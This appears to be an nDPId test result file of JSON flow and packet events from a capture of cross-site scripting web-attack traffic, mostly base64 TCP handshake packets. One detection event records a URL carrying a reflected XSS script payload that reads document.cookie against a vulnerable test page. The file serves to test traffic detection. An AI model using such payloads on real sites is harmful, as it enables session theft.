+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347034467,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347034467,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52924,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rP1AAD4GGNOsEAABwKgKMs68AFB+VYXeAAAAAKACchBhZwAAAgQFtAQCCAoBOSkjAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1499347034467,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347034467,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzrxiNhMTflWF36AScSDufwAAAgQFtAQCCAoD4vqaATkpIwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1499347034468,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347034468,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rP5AAD4GGNqsEAABwKgKMs68AFB+VYXfYjYTFIAQAOWNhwAAAQEICgE5KSMD4vqa"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347035750,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347035750,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52938,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":607,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8OG5AAD4GjWKsEAABwKgKMs7KAFDI6hIKAAAAAKACchCJVwAAAgQFtAQCCAoBOSpkAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1499347035750,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347035750,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzsrSHYegyOoSC6AScSAwugAAAgQFtAQCCAoD4vvbATkqZAEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1499347035751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347035751,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0OG9AAD4GjWmsEAABwKgKMs7KAFDI6hIL0h2HoYAQAOXPwQAAAQEICgE5KmQD4vvb"} +01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":622,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347033203,"flow_last_seen":1499347037012,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347037012,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52910,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27AQ80NQUS4TAQLQVWHMAGXB11KUBK34NZA8RUUD143IFKQDS3P5%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347038276,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347038276,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52964,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83pNAAD4G5zysEAABwKgKMs7kAFBDY\/JIAAAAAKACchAsDwAAAgQFtAQCCAoBOSzbAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1499347038276,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347038276,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzuS5pPWWQ2PySaAScSB7fQAAAgQFtAQCCAoD4v5SATks2wEDAwc="} 
+00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1499347038277,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347038277,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03pRAAD4G50OsEAABwKgKMs7kAFBDY\/JJuaT1l4AQAOUahAAAAQEICgE5LNwD4v5S"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347039587,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347039587,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LfVAAD4Gl9usEAABwKgKMs7yAFDXyAPWAAAAAKACchCExgAAAgQFtAQCCAoBOS4jAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1499347039587,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347039587,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzvKH9tkB18gD16AScSAhMAAAAgQFtAQCCAoD4v+aATkuIwEDAwc="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":640,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1499347039588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347039588,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LfZAAD4Gl+KsEAABwKgKMs7yAFDXyAPXh\/bZAoAQAOXANwAAAQEICgE5LiMD4v+a"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347042150,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347042150,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8q1JAAD4GGn6sEAABwKgKMs8MAFB23Zv2AAAAAKACchBK9gAAAgQFtAQCCAoBOTCkAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347042150,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzwwb3aSHdt2b96AScSCFcgAAAgQFtAQCCAoD4wIbATkwpAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1499347042150,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347042150,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0q1NAAD4GGoWsEAABwKgKMs8MAFB23Zv3G92kiIAQAOUkegAAAQEICgE5MKQD4wIb"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347043416,"flow_last_seen":1499347043416,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347043416,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1499347043416,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043416,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8okxAAD4GI4SsEAABwKgKMs8aAFDJVZOtAAAAAKACchD\/ewAAAgQFtAQCCAoBOTHhAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1499347043417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347043417,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzxosqk4zyVWTrqAScSB+QwAAAgQFtAQCCAoD4wNXATkx4QEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1499347043417,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347043417,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ok1AAD4GI4usEAABwKgKMs8aAFDJVZOuLKpONIAQAOUdSwAAAQEICgE5MeED4wNX"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347044676,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347044676,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8QP5AAD4GhNKsEAABwKgKMs8oAFCcEnPlAAAAAKACchBLPwAAAgQFtAQCCAoBOTMbAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1499347044676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347044676,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQzyh2l2DwnBJz5qAScSBsIQAAAgQFtAQCCAoD4wSSATkzGwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1499347044677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347044677,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0QP9AAD4GhNmsEAABwKgKMs8oAFCcEnPmdpdg8YAQAOULKAAAAQEICgE5MxwD4wSS"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347047249,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347047249,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rOxAAD4GGOSsEAABwKgKMs9CAFBNBJlzAAAAAKACchByIQAAAgQFtAQCCAoBOTWfAAAAAAEDAwc="} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1499347047249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347047249,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz0I8cGwCTQSZdKAScSC\/lQAAAgQFtAQCCAoD4wcVATk1nwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1499347047250,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347047250,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rO1AAD4GGOusEAABwKgKMs9CAFBNBJl0PHBsA4AQAOVenQAAAQEICgE5NZ8D4wcV"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347048548,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347048548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rW1AAD4GGGOsEAABwKgKMs9QAFDoOZuOAAAAAKACchDTfgAAAgQFtAQCCAoBOTbjAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1499347048548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347048548,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz1DxNtWr6Dmbj6AScSABPgAAAgQFtAQCCAoD4whaATk24wEDAwc="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":1499347048549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347048549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rW5AAD4GGGqsEAABwKgKMs9QAFDoOZuP8TbVrIAQAOWgRAAAAQEICgE5NuQD4wha"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347051144,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347051144,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"ABm5CmnxAMGxFOsxCABFAAA82StAAD4G7KSsEAABwKgKMs9qAFDGDOBHAAAAAKACchCuTwAAAgQFtAQCCAoBOTlsAAAAAAEDAwc="} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1499347051144,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347051144,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz2oBc4vXxgzgSKAScSATHgAAAgQFtAQCCAoD4wrjATk5bAEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1499347051145,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347051145,"pkt":"ABm5CmnxAMGxFOsxCABFAAA02SxAAD4G7KusEAABwKgKMs9qAFDGDOBIAXOL2IAQAOWyJAAAAQEICgE5OW0D4wrj"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347052434,"flow_last_seen":1499347052434,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347052434,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":740,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1499347052434,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052434,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8athAAD4GWvisEAABwKgKMs94AFBfSFB3AAAAAKACchCjkwAAAgQFtAQCCAoBOTqvAAAAAAEDAwc="} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":741,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":2,"flow_last_seen":1499347052435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347052435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQz3hoydAQX0hQeKAScSBbjwAAAgQFtAQCCAoD4wwmATk6rwEDAwc="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":742,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1499347052435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347052435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0atlAAD4GWv+sEAABwKgKMs94AFBfSFB4aMnQEYAQAOX6lgAAAQEICgE5Oq8D4wwm"} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347053735,"flow_last_seen":1499347053735,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347053735,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":755,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1499347053735,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347053735,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8TcZAAD4GeAqsEAABwKgKMs+GAFAPQXYyAAAAAKACchDMjAAAAgQFtAQCCAoBOTv0AAAAAAEDAwc="} 